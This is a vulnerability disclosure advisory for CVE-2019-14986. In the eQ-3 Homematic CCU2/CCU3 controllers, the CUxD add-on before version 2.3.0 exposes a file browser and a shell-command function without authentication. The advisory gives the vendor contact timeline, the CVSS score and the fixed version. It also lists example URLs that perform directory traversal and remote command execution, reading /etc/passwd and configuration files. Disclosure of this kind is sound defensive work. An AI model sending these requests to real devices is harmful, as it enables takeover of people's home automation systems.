CVE-2019-14986 eQ-3 Homematic CCU2 and CCU3 with the 'CUxD' AddOn version prior 2.3.0 installed allows administrative operations by unauthenticated attackers with access to the web interface, because features such as File-Browser and Shell Command (as well as 'Set root password') are exposed

Overview

  • CVE: CVE-2019-14986
  • Author: psytester
  • Title: eQ-3 Homematic CCU2 and CCU3 with the ‘CUxD’ AddOn version prior 2.3.0 installed allows administrative operations by unauthenticated attackers with access to the web interface, because features such as File-Browser and Shell Command (as well as “Set root password”) are exposed
  • Vulnerability Type: CWE-284: Improper Access Control
  • CVSSv3 Base Score: 10.0
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Publishing Date: 13.08.2019
  • Updated: –
  • Vendor: eQ-3 AG
  • Product: Homematic CCU2 and CCU3
  • Vendor eQ-3 contacted: 13.02.2019
  • Vendor eQ-3 response on 11.04.2019 with “not responsible for AddOns”
  • Addon itself:
    • Developer of ‘CUxD’ AddOn contacted: 07.05.2019
    • Developer of ‘CUxD’ AddOn confirmation: 08.05.2019
    • Affected ‘CUxD’ AddOn version: 2.2.0 and prior
    • ‘CUxD’ AddOn patched since version: 2.3.0

Background

From ELVjournal 06/2014 translated:
The Homematic additional software CUx-Daemon (short CUxD) is a universal interface between the Homematic central unit and components of other home control or SmartHome systems. These include the ELV FS20, FHT, HMS and EM/ESA systems, but also components of the EnOcean system and much more. By integrating these products, which are actually incompatible, the scope of the Homematic System can be extended beyond borders. In a multi-part article series we want to present CUxD, installations and possible uses in more detail.

From ELVjournal 02/2015 translated:
The general emergency management functions can be accessed via the URL “http://CCU-IP-Adresse/addons/cuxd/maintenance.html”. For example, all processes currently started on the CCU can be displayed here. A great advantage is that this page can be called up much faster than the WebUI and that even after a crash of the ReGaHss service, the WebUI or the CUxD, this website can still be accessed via web browser with all the functions offered. A CCU restart from a distance is also possible in case of problems. The last item “Shell command” can be used to start any CCU shell commands, the output takes place in a separate browser window.

From eQ-3 vendor’s website for CCU2:
HomeMatic Central Control Unit CCU2

Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]

From eQ-3 vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]

Issue Description

‘CUxD’ is the most popular AddOn for Homematic CCU.
While analyzing the CCU web interface based on given page files in file system path /www and the ‘CUxD’ AddOn management functions, this is another Improper Access Control resulting into Remote Code Execution and Directory Traversal vulnerability, if ‘CUxD’ AddOn prior to version 2.3.0 is installed.
This vulnerability can be exploited by unauthenticated attackers with access to the web interface, because CUxD administration interface can be secured by a basic authentication, but this is not forced during setup and most installations are still unprotected.

The CUxD administration interface provides several service functions and the following HTTP requests in Web Browser illustrates the attack vectors:

Build-in File-Browser for Directory Traversal:

http://1.2.3.4/addons/cuxd/index.ccc?file=%2fetc%2fpasswd
http://1.2.3.4/addons/cuxd/index.ccc?file=%2fusr%2flocal%2fetc%2fconfig%2fhomematic.regadom
http://1.2.3.4/addons/cuxd/index.ccc?file=%2ftmp%2fevent%2fsubscriber.list

Remote Code Execution via “Shell command” function:

http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=ls+-l+/etc
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/etc/passwd
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/usr/local/etc/config/homematic.regadom
http://1.2.3.4/addons/cuxd/index.ccc?pass=&maintenance=9&cmd=cat+/tmp/event/subscriber.list

Since CUxD version 2.3.0 this access is protected by default with a valid user session.
The user must explicitly disable the protection or can soften it, which is not a good idea.

CVE

CVE-2019-14986

CVSSv3 Base Score

CVSSv3 Base Score: 10.0

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit

psytester

Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’?
You can download
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 13, 2019